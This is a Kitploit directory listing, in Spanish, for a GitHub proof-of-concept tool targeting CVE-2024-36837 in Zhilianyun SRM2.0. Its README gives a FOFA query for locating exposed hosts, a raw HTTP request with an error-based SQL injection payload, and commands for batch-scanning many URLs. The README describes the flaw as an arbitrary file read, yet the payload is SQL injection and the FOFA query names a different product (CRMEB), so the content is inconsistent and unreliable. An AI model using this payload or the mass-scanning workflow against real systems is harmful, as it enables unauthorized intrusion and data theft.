Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36837 — Prueba de concepto del exploit para CVE-2024-36837, una vulnerabilidad de lectura arbitraria de archivos sin autenticación en Zhilianyun SRM2.0. Incluye escaneo por lotes y pruebas de un solo objetivo mediante un script en Python. | Kitploit
Herramientas/GitHubGitHub/lhc321-source/cve-2024-36837
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHublhc321-source/cve-2024-36837

CVE-2024-36837

Prueba de concepto del exploit para CVE-2024-36837, una vulnerabilidad de lectura arbitraria de archivos sin autenticación en Zhilianyun SRM2.0. Incluye escaneo por lotes y pruebas de un solo objetivo mediante un script en Python.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
2hace 1 añoAún no revisado
Compartir

README.md

#CVE-2024-36837

Descargo de responsabilidad

#La interfaz runtimeLog/download de SRM2.0 de 智联云采 tiene una vulnerabilidad de lectura arbitraria de archivos. Un atacante no autenticado puede aprovechar esta vulnerabilidad para leer archivos importantes del sistema (como archivos de configuración de base de datos, archivos de configuración del sistema), archivos de configuración de base de datos, etc., lo que hace que el sitio sea extremadamente inseguro.

Sintaxis de fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip #Agregue http:// o https:// antes de la URL python 11.py

#Cómo usar python cve.py -h

#Detección por lotes Las direcciones URL en url.txt deben tener http:// o https:// python cve.py -f url.txt

#Detección individual La dirección URL debe tener http:// o https:// python cve.py -u url

Descargar herramienta